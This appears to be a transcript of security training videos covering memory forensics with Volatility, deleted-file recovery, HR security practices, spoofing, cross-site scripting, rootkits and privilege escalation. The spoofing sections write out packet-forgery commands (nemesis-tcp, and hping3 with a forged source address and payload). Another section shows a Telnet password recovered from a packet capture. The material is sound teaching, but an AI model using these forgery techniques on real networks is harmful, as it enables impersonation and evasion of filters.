Source up here is PhysicalMemory, of which there is a little over 500 MB worth. I want to send it over to a
NetCat location. So I'm gonna put in the IP address of our Kali Linux host which is listening on port 8888.
And I'll click Acquire. So it asks me if this is okay, if I want to do this, I'm going to click Yes. And now it says
it's copying to physical memory. [The command prompt window opens with the message Copying physical
memory.] Of course it's copying it over the network to our Linux host. Back here in Kali Linux, we can see in
fact that we've got a connection from a host called 192.168.1.242. Well, that's actually not what it's called, but
that is its IP address. So now it's just a matter of waiting until we receive the entire memory dump before we
can analyze it using a different tool called Volatility. We can now see in Linux that it received a number of
bytes. And if we type ls, we'll see the existence of our clientmemdump1.dd file. So the next thing we'll do is
use a different tool, and that's going to be Volatility, to analyze that file.
So with Volatility, I'm going to use -f for file. I'll specify the file name. And the first thing we'll start off with is
asking it to give us just a little bit of image information about that memory dump image. Depending on the
amount of memory gathered, that might take just a few seconds or it might take a few minutes. Okay, so it
looks like, next to Suggested Profile(s), it's a Windows XP machine. And further down, the Number of
Processors is set to 1. And then we have image date and time stamp information listed down below. I'm going
to use the up-arrow key to bring up that Volatility command again. Except, instead of imageinfo as the last
parameter, this time we're going to use pslist to give us a list of running processes at the time that the memory
dump was acquired. And sometimes that can be absolutely crucial when it comes to evidence in a specific
case. So we have a list of the processes here, and of course we see the date and time stamps over on the far
right. Let's clear the screen and bring up that command again. And let's change the last parameter from pslist in
this case to connscan to show any active connections, again, at the time that the memory dump was acquired.
Here we can see we have numerous connections to something on port 80, [A list of connections is
displayed.] we can see IP addresses. Now of course, there are ways that we can conduct reverse lookups.
For instance, using nslookup, which I can do here in Linux. I can set type=ptr to do a reverse portal lookup,
and maybe I'll pop in the first IP address I see here. [He enters the IP address 23.34.200.121.] And then I get
answers back that are listed from that. I get a non-authoritative answer, which means it came from a different
DNS server. You can see that we've issued the volatility command against our dump file again. But we've used
as a last parameter clipboard to show us the contents of what was copied in memory. [A table with column
headers such as Session, WindowStation Format, Handle, Object, and Data is displayed.] And notice that
under the Data column on the right it looks like we've got some kind of variation of my dog has fleas, which
appears to be some kind of a password. So we can start gathering some very detailed information from what
was happening within a memory dump at the time that it was acquired. In this video, we learned how to create
a physical memory dump.
[Topic title: Viewing Deleted Files on a Hard Disk. The presenter is Dan Lachance.] In this video I'll
demonstrate how to view deleted files on a hard disk. [The Restoration folder is open in the Windows File
Explorer. It displays files such as DLL16.DLL, DLL32.DLL, file_id.diz, FreePC.rtf, and
Restoration.exe.] Most of us know that when we delete a file it actually just goes into the Recycle Bin, at least
on the Windows platform. And, of course, if we empty the Recycle Bin, the file appears to be gone forever. Of
course, that's not the case. Files are always retrievable even if you repartition a disk, let alone format the file
system on that partition. And that's why it's important that we use the appropriate disk scrubbing or cleansing
tools to wipe the content from the disk appropriately. And depending on the industry we're in, there might only
approved tools that we're allowed to use to do that. Here I've downloaded and have available a free file
restoration tools for the Windows platform. So I'm going to go ahead and open up this Restoration
program. [The Restoration Version 3.2.13 window opens. It is divided into two sections. The first section
displays many column headers such as name, In Folder, Size, and Modified. The second section displays the
Drives drop-down list box, buttons named Search Deleted Files, Restore by Copying, and Exit. The All or part
of the file textbox is also displayed.] And I'm going to leave it on drive C, and I'll click the Search Deleted
Files. And immediately we can see the number of files that it's found that were removed from the hard disk on
this system. So we can see the name of the file, the folder it was in, the size and the modification date and
timestamp, although the modification column is cut off a little bit currently in the display. But we can widen
that after the fact.
Now we have the choice of selecting either a single file. [The presenter selects a few files by using the Control
and Shift option.] Let's just verify that we can see the modified column. Or we could use Ctrl-click to select
non-adjacent multiple files or even Shift-click for adjacent files. The idea is that we select these files because
we then have the option of clicking the Restore by Copying button at the bottom right. [The Save As dialog
box opens.] And we can determine exactly where it is that we want to restore those entries. Now at the same
time we should also bear in mind there are other tools that we might use to look at deleted files. Here I've got
the EnCase Enterprise tool [He switches to the EnCase Enterprise Edition window. The window includes a
menu bar below which are several buttons for New, Open, Save, and Print. Below the buttons, the window is
divided into three sections. The first section includes nodes such as Cases and subnodes named Case 1 and C.
The second section displays many files in a tabular format. Some of the column headers are name, Filter, In
Report, File Ext, and File Type. The third section is below the first two sections. ] where I've already created a
case file and acquired the contents of drive C, as you can see clearly here. So of course, we can peruse drive C
and see what's there at the point of time that this evidence was acquired. But it's always important to think
about making sure [He right-clicks the C subnode.] that there's no tampering with evidence. Of course, that
means following the chain of custody. One aspect of that is to create a hash. So here in EnCase, I could right-
click on drive C and choose to generate a hash [He selects Hash from the shortcut menu and the Hash window
opens.] for all sectors on this partition, or I could specify a subset. Of course, at the Windows command
line, [He switches to the Windows PowerShell window.] for instance, in PowerShell, we can use the get-
filehash cmdlet, [He refers to cmdlet get-filehash and the hash
EDABA50089717400A673F3972DA4D379702FDO8A8FA7123749745E6C9BE3C2D6.] given a file name to
result in a hash. Now the idea is that when we generate a hash in the future and compare it to this hash, if
anything's changed, the hash will be different and so we'll know that something has changed. [He switches to
the EnCase Enterprise Edition window.] And the same thing is true here in the EnCase tool. [He switches to
the Disk Scrubber v3.4 window.] There are plenty of tools available for scrubbing or wiping disks. [The Disk
Scrubber v3.4 window includes the Drive to Scrub drop-down list box which displays the options available.
The window also includes the Priority drop-down list box and adjacent to it is the Scrub Drive button. Radio
buttons for the options Normal (Random Pattern Only), Heavy (3-Stage Pattern, 0s+Rnd), Super (5-Stage,
0s+1s+Chk1+Chk0+Rnd), and Ultra ((-Stage, DoD recomended spec w/Vfy) are displayed.] Here I'm looking
at the Disk Scrubber tool where we can choose the disk that we want to sanitize, essentially. We can scrub it
and we can also determine exactly how that's going to happen where we can have multistage overwrites of
randomized data. Now this way, if a disk is wiped in a thorough manner, it makes it much more difficult for
anyone to acquire any data remnants in the future. In this video we discussed how to view deleted files on a
hard disk.
Table of Contents
[Topic: Hiring and Background Checks. The presenter is Dan Lachance.] Taking the time up front to be very
careful about which employees get hired in a company can pay dividends over the long term. In this video,
we'll talk about Hiring and Background Checks. The first core item that we must consider is, how qualified an
individual is for a given job role. Do they have the correct skill sets? Are they suitable in terms of their
personality for what's expected of them and are they trustworthy? Job descriptions then, must be detailed and
well-written to attract the appropriate candidates. Also, certain positions might have access to classified data or
sensitive information. And as such, it might be especially important to conduct a thorough background check
for this type of position. Competencies for potential employees might require that teamwork, leadership, and a
proper proven background of ethics be used within the job role. There are also different types of reference
checks for potential employees like personal references that might be able to attest to the character of the
individual. Work references of course, lead a lot of insight into the past work history of an individual. A
thorough background check could uncover additional information not disclosed by the potential employee. We
can use this thorough background check result and information perhaps to make a decision about hiring,
because it might be related to minimizing future lawsuits. Or to even actually identify falsifications perpetrated
by the potential employee, related to things like their work history, their job roles and duties in the past, their
reasons for leaving jobs. Or it might also bring to light criminal past history.
The benefits of thorough background checks, even though it might cost more and take more time up front, are
overall a reduced hiring cost. Protection against potential lawsuits, lower employee turnover, and the
identifying of criminal activity. So over the long term, what we're doing is being very selective of who gets
hired to ensure the best possible candidate is filling a job role. Other things that might be done with
background checks and employee hiring include polygraph tests, or drug tests, or even personality testing.
There's also the timing that we must think about in terms of the full support that would be required or items
that should be done prior to hiring, such as completing a background check for criminal activity. And also even
when people are hired, it's important that in terms of timing that we periodically re-investigate some of these
aspects. This might include periodic drug testing of employees. Then there's also the financial side of things,
such as conducting a credit check by looking at the credit history of either potential new employees or even
existing employees. The reason this can be important is because people in desperate financial situations will
sometimes resort to desperate attempts to get money, perhaps to pay off lenders. And so over time we might be
able to shed light on this actually happening in the organization where people that have access to customer
credit card numbers might actually be using them fraudulently. Driving records might also be very important,
certainly if the job position involves driving for a company business. You might also want to validate social
security numbers to make sure that they actually exist. You might also want to have a cross reference check
against a terror watch list for potential employees. In this video, we discussed Hiring and Background Checks.
[Topic: User Onboarding and Offboarding. The presenter is Dan Lachance.] Most organizations have a
specific hiring and termination set of procedures for users. And in this video, we'll take a look at user
onboarding and offboarding. With user onboarding, there's often an employment agreement and acceptable use
policies that the user must sign off on, prior to starting employment. These documents often include company
rules and restrictions, and will include various security policies and acceptable use policies, for example, email
and VPN acceptable use. It will certainly include a job description of what is expected of the user. And any
violation consequences that might be taken into consideration when any rules are broken. Of course, the
employment agreement will also detail whether it's a term or a permanent position, or detail things like the
length of employment. In some cases, a non-disclosure agreement, or NDA, must be signed by the new
employee, to protect confidential information. Such as trade secrets, proprietary company information, or, if
the user is dealing with legal contracts, they'll often have to sign an NDA related to that. So essentially an
NDA, or non-disclosure agreement, is an agreement to not disclose sensitive information. Violations could
result in strict penalties, including being terminated. User onboarding often includes the creation of a new user
account and group membership, to give access to specific resources. It might also include the issuance of
various access cards to access a parkade, or a building, or even a certain floor in a building.
User training is often conducted so that users are aware of how procedures are run within the organization, and
also should include security training. With user offboarding, often many companies will conduct an exit
interview, to determine what the user thought of their experience and what might need to be improved. User
offboarding also means environment security, which includes things about physical aspects of what the user
was doing in the company, such as their workspace and any equipment that they physically had access to. User
offboarding must also stipulate what would be done with disgruntled employees that need to be removed from
the premises. Often, this means they need to be escorted by security personnel. Employee temperament also
plays a part in user offboarding, where some disgruntled employees might become belligerent or violent. So
terminations, then, need to be planned ahead of time within the organization. There should be a specific
defined procedure that is known by HR and other related individuals.
This could also be something that's done in a private environment, such as within a single organization, or even
within a department within the organization. So documents need to be prepared to document how termination
should occur. And the idea is to reduce any negative incidents, including data leakage, when users are
offboarded. Employee equipment includes things like mobile devices, such as smartphones and tablets,
laptops, vehicles, and so on. So it's important that this equipment be returned and properly sanitized if needed.
There's also the computer account of a user, any email or VPN accounts that they were given access to, that
would either have to be suspended or disabled, or removed according to company policy. HR, of course, must
take into account the final paycheck that is owed to the employee. Security must be notified in terms of IT
security, and also physical security personnel, that a user is leaving the company. Often a witness is required
when a user is being terminated, that could be a manager or a security official within the organization. It's also
important to obtain any ID or badges or keys that were issued to the employee upon hiring. Once terminated,
the user might be escorted off premises and told that they're not allowed to return. In this video, we discussed
user onboarding and offboarding.
[Topic: Personnel Management Best Practices. The presenter is Dan Lachance.] In this video we'll talk about
Personnel Management Best Practices. For users within the organization there needs to be ongoing
supervision. There should be periodic performance reviews that we can compensate well performing users with
or recognize them for their contributions to the organization. Performance reviews can also be used to develop
skill sets for employees in terms of future ambitions for acquiring certain certifications or other job roles
within the company. The performance review can also define the training requirements in order for a user to
reach those goals. Performance reviews can also shed light on the overall morale of users within the company.
Job rotation is used to reduce the risk of collusion by placing people in different jobs on a periodic basis. Any
fraudulent or unauthorized activity could come to light when a new user takes on a job role handled by another
user previously. Separation of duties ensures that one employee isn't solely responsible for all of the parts of a
business process, from beginning to end. Succession planning is also important to ensure that we always have
additional candidates that are suitable for a job role for a user that might leave the organization, or might, for
example, retire within a period of time.
Dual control requires at least two people to be involved with a specific business process. The idea here is that
we reduce the possibility of fraudulent activity. Although we aren't eliminating the possibility of collusion
between those two or more persons. Cross training allows us to make sure that all of our eggs aren't in one
basket. So that we're not dependent upon a single employee to perform a special job role, especially if it's
crucial to business operations. The principle of least privilege states that we should grant only the required
permissions for a user to perform a job role and nothing more. Periodically, we can check that this is being
adhered to through various audits. Mandatory vacations not only ensure that employees are freshened and are
well relaxed and ready to come back to work and be productive. But they also allow the identification of
abnormalities in their job roles while someone else fills in for them while they are on vacation. In this video,
we discussed Personnel Management Best Practices.
[Topic: Threats, Vulnerabilities, and Exploits. The presenter is Dan Lachance.] In this video we'll talk about
Threats, Vulnerabilities and Exploits. The first thing to say is that the terms are often confused. So the
distinction between Threats, Vulnerabilities and Exploits is very important for a number of reasons. Such as
when we take a look at documentation that refers to these terms, or in the crafting or use of organizational
security policies. It's important to understand that when we talk about security the weakest link in a chain
essentially defines your security posture, so it's important that we identify those weak links and do something
about them. With a threat we need to have an inventory of assets that need to be protected against those threats.
So an asset inventory then allows us to perform a threat analysis against those assets. We can then determine
what kind of negative impact against an asset might be realized. So essentially this is an impact analysis.
Assets and threats need to be prioritized so that way, energy and resources can be allocated accordingly. A
vulnerability is a weakness. It could apply at the hardware level where we're running out of date firmware for
instance on a wireless router that has known vulnerabilities or it could be the lack of physical security controls.
Maybe servers are behind a locked door. At the software level, a vulnerability could be exposed until software
updates are applied. Often software updates address this type of issue. But sometimes a software
misconfiguration can present a vulnerability that can be exploited by a malicious user. Some cases, even
sticking with the default settings in some software, can mean that we've got vulnerabilities.
An exploit takes advantage of a vulnerability or weakness. Now this can be done legitimately when we
conduct penetration testing to identify these vulnerabilities that actually can be exploited because then we can
mitigate them in some way. But at the same time malicious users might exploit a known vulnerability if we
haven't put a security control in place to mitigate that vulnerability. Zero-day exploits are those that are not
known by vendors or the general IT security community. However it is known by one or more malicious users
and they can take advantage of them. In some cases zero-day exploits might be indirectly detected with some
kind of intrusion detection or prevention system. Because it's really looking for suspicious activity out of the
norm, which could indicate a zero-day attack of some kind. An example of a threat would be the loss of data
availability. Now that could be for numerous reasons because a server has crashed or because files have been
locked due to ransomware. A vulnerability might be the lack of user awareness in training that might lead to
something like ransomware where the user opens up an email and opens up a file attachment that they didn't
ask for or weren't expecting. The exploit of course would trick the user somehow into opening something like
a file attachment that would spawn ransomware. In this video, we discussed threats, vulnerabilities, and
exploits.
[Topic: Spoofing. The presenter is Dan Lachance.] Forgery has been around for a long time. Whether it's in
the form of a forged signature, a fake passport, or even counterfeit money. In this video, let's talk about
spoofing. Spoofing is forgery, and in the digital IT world, there are many different types of spoofing attacks to
fake an identity. This includes MAC address spoofing, which might be used by malicious users so that they
can make a connection to a wireless access point that uses MAC address filtering. IP address spoofing might
be used to defeat basic packet filtering rules that are simply based on a source network range or IP address.
DNS spoofing is often called DNS cache poisoning. Essentially, an attacker can compromise either the
localhost's file on a device or a DNS server, so that when a user attempts to connect to a friendly name, they're
instead redirected, unknowingly, to a fraudulent, for example, website that looks like legitimate website. Email
spoofing is an email message that appears to come from a valid email address, where the email address was
actually completely faked.
And this is possible in some mail systems. Man-in-the-middle attacks are used to interrupt communication
between two parties by forging the identity of one of the parties and knocking that party offline. Now this
would be unknown to the other end of the communication. Session hijacking has many different attack types,
including IP spoofing. Now, with a man-in-the-middle attack, we are essentially interrupting the
communication between two parties. There are many ways that this can be perpetrated, including through SSO,
or simply through IP spoofing. SYN scanning can also be used with attack types with spoofing. With SYN
scanning, the malicious user attempts to set up an IP connection with a host at different port numbers. Now,
this is done by sending a synchronization or SYN packet. And often, this is done to attempt to fake the
initiation of a three way handshake to different services running on a server.
There are many freely available tools that can be use to spoof packets. So, for example, pictured on the screen
we're seeing the use of the nemesis-tcp tool. [Dan explains the following line on screen: nemesis-tcp -v -S
200.1.1.1 -D 56.37.87.98 -P /fakepayload.txt] Where -v turns on verbose screen output. -S specifies the source
that we want this to appear to have come from. -D is the destination we're sending this traffic to. And -P
specifies the location of a payload file, where we could determine whatever we want to be seen in this
transmission from a simple text file. So as you can see, it's very easy to forge an entire TCP packet. Any
network intrusion detection or prevention tools, even host intrusion detection and prevention tools that might
look at packets, would probably not be able to identify that this is forged. Now unless you're using some kind
of encryption and digital signature at the packet level, it's pretty hard to determine what you're looking at on
the network has been forged or not. In this video, we discussed spoofing.
[Topic: Packet Forgery using Kali Linux. The presenter is Dan Lachance.] Spoofing means forgery. In this
video, I'll demonstrate how to forge packets or how to spoof packets using tools available in Kali Linux. [The
root@kali:~ command prompt window is open. The following command is displayed on screen: cat
fakepayload.txt. The output is as follows: This is fake data used in a spoofed packet.] There are plenty of tools
out there for different platforms, including Windows, where you can create your own packets completely,
entirely, including the payload and all header fields and then send it out on the network. Whether it's a wired or
wireless network. So here in Kali Linux, I've created a file called fakepayload.txt and I've catted it here using
the cat command so we can see what's in it. It simply says this is fake data used in a spoofed packet. What
we're going to do here is we're going to use the hping3 command to forge or create a fake TCP packet. So I'm
going to type hping3, that's the command. What I want to do is send this to a target at 192.168.1.1. So I'm
going to be placing a packet or packets out in the network. That's where they're going. That's the destination.
Now I'm going to use --spoof. And I want it to look like it's coming from a host at 4.5.6.7. So I'm forging that
or really I'm spoofing that. The next thing I want to do is give it a TTL, let's say of 31. The TTL value in the IP
header field is decremented each time a packet goes through a router.
And so different operating systems start off with different TTL values like 127 or 255, 128 and so on. So this
is going to indicate then that the packet appears to not have originated on the local subnet even though it
actually has. I'm going to give it the --baseport of 44444. In other words, this is a higher level source port, for
example, from a client. And the --destport, destination port, let's say is port 80. So it looks like it's going to
port 80 and this is a transmission from a client so it's a higher level port number. And finally, I'll use -E and I'll
tell it I want to use my fakepayload.txt file. And I'll just make sure that I put in -d 150, to make sure I'm telling
it a size that can accommodate what's in my fake payload. Now, before I press Enter, I'm going to start a
Wireshark packet capturing session. Like Kali Linux, Wireshark is another free tool that you can download
and use. [The Wireshark Network Analyzer Window is open. Running along the top is a menu bar with various
menus such as File, Edit, View, and so on. Below that is a toolbar with several icons such as save, refresh, and
so on. Below that is a Filter field with the following entry: ip.dst==192.168.1.1. Next to this field is a drop-
down icon and three options, which are Expression, Clear, and Apply. The rest of the window is divided into
four sections, which are Capture, Files, Online, and Capture Help.] So here in Wireshark, I'll click the
leftmost icon [from the toolbar] to begin a packet capture. [The Wireshark: Capture Interfaces dialog box
opens. It lists various network interfaces with IP addresses. There are three buttons at the end of each line,
namely Start, Options, and Details. There are also two buttons at the bottom of the dialog box, namely Help
and Close.] I'm going to select the appropriate network interface here, where I've got traffic on my machine
and I'll click Start. [Dan clicks the start button corresponding to IP address 192.168.1.157.]
And at this point, it's capturing network traffic. [The Capturing from Microsoft - Wireshark page opens in the
window.] I've already got a filter here where the IP destination equals 192.168.1.1. Notice nothing is listed
because we haven't yet injected our fake packet. All right, [The screen switches to root@kali:~ command
prompt window.] so now that we're capturing network traffic, let's go ahead and send out our fake traffic. So
I'm going to press Enter back here. [Dan executes the hping3 command that he had previously typed.] Even
though I've got a message saying operation not supported, can't disable memory paging, it's all good. It is
continuously transmitting those forged packets. Now, if we switch over to Wireshark we're going to see just
that. Notice here in WireShark, [He switches back to the Wireshark window.] we have what appears to be
traffic coming from 4.5.6.7, destined for 192.168.1.1 and it keeps going. Let's stop the capture with the fourth
icon from the left [on the toolbar] and let's just click on one of these. [He selects one of the packets.] So, if we
were to examine the ethernet header, well, we've just got some MAC address information. And we certainly
could have spoofed the MAC address, although we didn't in our case. Here in the IP header, notice that we've
got interesting things, like the TTL, the Time to Live is actually set to a value of 31. And the source and
destination IP addresses are as per what we instructed.
And if we go a little bit deeper, you can see down here in the text portion of the payload, it says this is fake
data used in a spoofed packet. So clearly, the message here is that it's very easy to craft or create forged traffic
and put it out on a network. Now, there are many intrusion detection and prevention systems. Even if you're
just generally periodically capturing network traffic, you need to take it with a grain of salt. Just because you
see a specific piece of traffic on the network, it doesn't mean it actually is legitimate and originated from where
it appears to have originated. In this video, we learned how to forge packets using Kali Linux.
Upon completion of this video, you will be able to recognize how impersonation can be used to gain
unauthorized access.
Objectives
[Topic: Impersonation. The presenter is Dan Lachance.] In this video, I'll talk about Impersonation. One form
of impersonation is social engineering, where a malicious user might pose as someone from the help desk,
asking a user for their current password, which is required for a password reset. Now this might happen over
the telephone, or it might come through a spoofed email message. In the same way, a malicious user could
pose as a telecom provider to gain physical access to a wiring closet. Or, they could pose as a banker or a bank
that a user does banking with in order to gain access to their specific account details. And again, that could
happen over the phone or most often, through an email message with a link to a fraudulent site. At the user
level, impersonation can take the form of a user connection to a web app, in other words, a session. At the
device level, we could be using a device to establish a VPN session. And that connection possibly could be
impersonated. But in order for this type of impersonation to take place in a web application session or VPN
session, a lot of things have to go right for the attacker. This is where a man-in-the-middle attack comes in,
which is often called an MitM. This is a real time exploit where we originally have two communicating parties
that are both legitimate. However, we have an attacker in the middle. Now, both parties will assume that they
are communicating directly.
They don't know that there's someone in the middle that's capturing the conversation and perhaps even
modifying messages before they're being relayed to another party. Although, with a man-in-the-middle attack,
the messages don't necessary have to be modified but they are being caught or viewed and then relayed off to
the other party. So in some cases when that data is altered, it means that the man-in-the-middle attacker has the
ability to do things like alter the course of a banking transaction, and so on. Man-in-the-middle SSL or TLS
attacks, means that a compromised system might be configured to trust certificates from any authority. Now,
today's devices, including smartphones, have a certificate store where they have a number of trusted root
certificates. Now these trusted root certificates are used when the device connects to, for example, a VPN that
uses certificates or an HTTPS website, and they will look at the signer of the certificate, for example, to that
HTTPS website, to see if they trust the signer. Now the problem is that most of today's devices have way too
many trusted root certificates. And as a matter of fact, if any of them are compromised, so are all of their
certificates, potentially. So, when an attacker potentially compromises a system, what he or she could do, is
install a trusted root certificate authority under their control.
Now, what this means then, is that a client that would connect to a protected HTTPS web server, for instance,
would then trust that signer. And therefore, the user wouldn't get a warning that the site shouldn't be trusted.
Now, clients don't normally require a PKI certificate in this kind of example, but servers do. Another aspect to
consider with impersonation is a compromised private key. When we talk about a PKI digital security
certificate, we are also implying that there is a public and private key pair that is unique and issued to a user, a
device, or an application. Well, if the private key is compromised somehow by a malicious user, then that
malicious user can essentially act, or do things on behalf of the owner of that private key. They can digitally
sign messages. Or they could decrypt messages that were intended to only be decrypted by the owner of the
private key. One way that a private key can be compromised is by brute force guessing. So, for instance, if a
user exports their private key to a file and uses an easy to guess password. And perhaps they store that on a
USB thumb drive which is lost or stolen. It's possible that it could be compromised simply by guessing
passwords. Impersonation also deals with session hijacking, essentially taking over previously established
session. And this is part of what can happen with a man-in-the-middle attack. There are various types of
session hijacking examples related to varying protocols like HTTP and FTP. However, in some cases, the
original legitimate station that is being taken over, essentially, in the communication, may be taken offline by
the attacker. So what are some countermeasures then for man-in-the-middle attacks and session hijacking?
Some of them are common fare, such as hardening devices, using dedicated servers for network services where
we don't collocate other network services on the same host. We might also consider using network and host
firewalls, both at both levels, to control in and outbound traffic.
The use of intrusion detection and prevention systems, or IDS and IPS systems, is highly recommended to
detect suspicious activity. We should also consider trimming down the list of trusted certificate authorities on
all devices. Otherwise, we really have an increased attack surface that really isn't necessary in most cases. As
always, user awareness and training of this possible security vulnerability is always important. We should also
make sure that we don't rely solely on IP address blocking, or even MAC address blocking for that matter.
When it comes to our security counter measures, they're good as one layer. But they shouldn't be the only thing
that's required because addresses are easily spoofed with freely available tools. In this video, we talked about
Impersonation.
[Topic: Cross-site Scripting. The presenter is Dan Lachance.] There are many crafty ways that malicious
users can force the execution of malicious code on machines. In this video, we'll discuss cross-site scripting. A
cross-site scripting attack begins in step 1, with an attacker injecting some kind of script code into a trusted
web site. Now this normally happens, for instance, through a field on a web form that isn't properly validated.
In other words, it might allow the user to input anything before the data gets saved and uploaded to the server.
Now usually what the attacker is doing is they are injecting their malicious code into server side scripts. In step
2, an unsuspecting user of that same site then executes the script. In step 3, the script is now running on the
unsuspecting user's computer locally in their browser. And could potentially access their cookies in their web
browser or other session details. Most modern web browsers are sandboxed, which means that anything
running in the context of that web app will not affect outside of that web application. They can't talk to the
operating system kernel and so on. But it depends on the version of the web browser and use on the client
device and how it's configured.
Cross-site scripting is often simply referred to as XSS. So what can we do about it? Well, some
countermeasures include filtering inputs. So we want to make sure that developers are following secure coding
guidelines. And that they are carefully validating every field on a web form, or even validating URL strings
sent to a server to be parsed, to make sure that only acceptable data exists. As always, user awareness training
is also very crucial. So that if a user notices some kind of suspicious activity or behavior in their browser, they
should generally be aware that maybe something is up, there could be some kind of a cross-site scripting attack
taking place. In other cases, cross-site scripting attacks execute code on a client machine in the background
where there may not be any visual indicator, at least at the time of the attack. Another type of attack is a cross-
site request forgery, which is often referred to as a CSRF. In this type of attack, code gets executed for a user
that's already authenticated to a web service. Now that code is executed by an attacker, not by the user. The
user doesn't know about it. So one way this could happen is an attacker to compromise a user system and then
have the ability to send a user authentication token that's been modified by the attacker to the web app.
Now this can be done by the attacker making changes to, or perhaps, modifying and sending off a web browser
cookie to a web app that already trusts that there is an established session in place. So the attacker then could
transmit instructions to the server without user consent. This could also take the form of a URL that the user is
tricked into clicking on. Maybe to transfer funds to a different account at a different banking institution and so
on. There are countermeasures that we can apply here to mitigate the effect of cross-site request forgeries. First
of all, the web application, server side, can ensure that requests came from the original session. There are many
techniques that usually developers would put in place, due to security coding guidelines, to make this happen.
Now, one would be to check the origin header in the HTTP request to make sure that it's valid and matches the
site. Or to use some kind of a challenge token that's unique to each session. Or to use some kind of a
randomized hidden cookie value that gets checked every time the cookie is sent to the server. Users, of course,
should not leave authenticated sessions open. So, for example, if a user is working with their email online or
working with online banking, as soon as they're finished with it, they should log out and not wait for the time
out to occur. At the same time, users should never save passwords for web applications. In this video, we
talked about cross-site scripting.
[Topic: Root Kits. The presenter is Dan Lachance.] In this video I'll talk about root kits. A root kit is form of
malware and it can apply to the Windows platform or the Unix or Linux platform including at the smartphone
level. So it's a form of malware that is usually delivered through a Trojan Virus. A Trojan Virus appears to be
something useful or benign, like free downloadable software. However in fact, it actually is used as a vehicle
to transport malware. So a root kit then creates a backdoor. A backdoor allows an intruder to keep elevated
access to a system or an application without detection. This can be done in many ways including by replacing
operating system files that allow and hide intruder access. For example, consider a root kit that replaces the
netstat command on the Windows and Linux platforms. The netstat command is usually used by administrators
to view any connections that are made to a machine on a given port or outbound connections made to other
machines on a given port. By replacing the netstat command, an attacker can hide the fact that they've got
some kind of a listener. Or that they've got some kind of a process that periodically reaches out to receive
instructions from some control center owned by a malicious user.
Kernel root kits exploit operating system kernels and their ability to be modular and expandable. Because if we
allow access to the operating system kernel, we are allowing access to everything. And, in many cases, things
like drivers are given operating system kernel ability. So even installing a driver could be a form of malware
that could infect a system and install a root kit. Now a root kit could also replace many files. It's not as if it has
to replace a single file. So in the case of hiding listening network sockets, as per our netstat example, we have
to know what a socket is. A socket is a combination of a protocol plus a host and a port such as http:// a host
name colon and then a port number. Other kernel root kits will actually hide files that aren't seen with normal
operating system commands. These files might contain illegal data or they might contain additional malware
payloads. Now we could also have running processes that are hidden from normal operating system tools like
the Windows Task Manager or the Linux ps command. There's also the possibility of kernel root kits being
spawned due to some hidden configuration somewhere such as in the Windows registry or within a Unix or
Linux configuration or .conf file. Now bear in mind, in order for a kernel root kit to be installed in the first
place, at some level the machine has to be compromised. Countermeasures to root kits include hardening the
network as well as hosts on the network.
And of course running up-to-date antimalware that might detect a root kit. There are also specific anti-rootkit
tools available from various vendors. Examples include the Malwarebytes Anti-Rootkit, or the McAfee
RootkitRemover. The use of intrusion detection and prevention systems is also really important in this case to
detect suspicious activities such as the replacement of operating system files. In the Windows world, user
account control, or UAC, can also be beneficial in that it can prompt the user of the system before anything
happens in the background, such as making a change to the registry to spawn some kind of a root kit. Also we
might consider disabling in the Unix and Linux platforms Loadable Kernel Modules or LKM. In other words,
we want to make sure that what's required for the kernel to function properly, things like IPv6, which may be
turned on or off from the kernel, or additional drivers. We want to make sure perhaps that they are compiled
into the Linux kernel where possible. In this example, [The Malwarebytes Anti-Rootkit BETA v1.09.3.1001
wizard is open. The wizard is divided into two parts. The first part is titled Overview, and it contains four
options that are Introduction, Update, Scan System, and Cleanup. The Scan System option is selected by
default. The second part displays the contents of the option selected in the first part. This part displays a Scan
Progress section, which contains three checkboxes, namely Drivers, Sectors, and System. It also has a Scan
button. At the bottom of the wizard are two buttons, Previous and Next.] you can see the Malwarebytes Anti-
Rootkit tool that's been installed on this system. Where down below, the scan targets that it will look at include
drivers, sectors on the disk, as well as the entire system. So I'm going to leave them all checked on and I'm
going to go ahead and click the Scan button. In this video we talked about root kits.
After completing this video, you will be able to explain the concept of privilege escalation.
Objectives
[Topic: Privilege Escalation. The presenter is Dan Lachance.] In this video, I'll talk about privilege escalation.
Privilege escalation allows the unintended granting of privileges to unauthorized parties. There are many types
of attacks that can result in privilege escalation, such as social engineering, to trick someone into divulging
things like credentials. Or packet sniffing tools, which can capture network traffic to reveal vulnerable items,
such as clear text passwords. Consider the example of using WireShark to capture network traffic, which we
see the result of here on screen. [The Telnet from Windows to BSD.pcapng page is open in Wireshark
window.] I'm going to filter this packet capture for Telnet traffic. Telnet is often used to remotely administer a
device. [Dan types telnet in the Filter field.] Like a switch or a router or even an operating system. However,
the problem with Telnet is nothing is encrypted. We really should be using SSH instead. So let's filter this
packet capture for Telnet. We can see we have a number of Telnet packets here. So I'll now go to the Analyze
menu. And I'll choose Follow TCP Stream. [from the drop-down.] And immediately we can see that the
password for user student has a value of chicago. [The Follow TCP Stream window opens.] So this is one way
where we could elevate privileges for the target where this set of credentials was used.
And now we have a way to get into that device. Other attack types include buffer overflows, where data goes
beyond allocated memory, for example, for a variable for a field on a form. So often, developers can ensure
that this doesn't happen, by making sure that their code never allocates more memory than is needed to
accommodate specific data types. Also, privilege escalation might result from a compromised system, where
an attacker has installed a rootkit. Or brute-frocing credentials for a privileged account could reveal the
password. Reconnaissance also can reveal things like service accounts that don't have any passwords, that an
attacker might take advantage of. Privilege escalation begins with a malicious user learning of systems through
reconnaissance techniques. That might include a ping sweep to get a list of hosts that are up on a network, but
they have to be on the network in the first place to do that. The next thing would be that the malicious user
would learn as much as possible about the systems that are up and running.
This can be done through enumerating ports, services, user accounts, and anything else that responds, using
freely available tools. This could lead to the attacker being able to compromise an unprivileged user account,
which they could then log in with to learn more. Eventually they might be able to compromise a privileged
user account. Which would allow them to do things like installing a rootkit to ensure that they have continued
future access through a hidden mechanism. Of course, attackers will then hide traces of the compromise,
perhaps by modifying log entries. What can we do about privilege escalation type of attacks? Well, hardening
is always something that is an option. We can apply firmware and software updates to all devices. We can
make sure that we are aware of software flaws, so that we can put controls in place to mitigate them. So for
example, if we absolutely must use insecure protocols like Telnet or FTP, maybe using it through a VPN
tunnel would be an acceptable mitigation. We should also be aware of configuration flaws. So depending on
how a tool or a piece of software is configured, it could lead to a vulnerability. In this video, we talked about
privilege escalation.
In this video, learn how to distinguish the difference between common exploit and tools.
Objectives
[Topic: Common Exploit Tools. The presenter is Dan Lachance.] In this video, we'll talk about Common
Exploit Tools. The first thing to consider is the fact that tools themselves are not malicious. Rather, it's how the
tools are used that can be malicious. There are plenty of freely available tools that can be used legitimately by
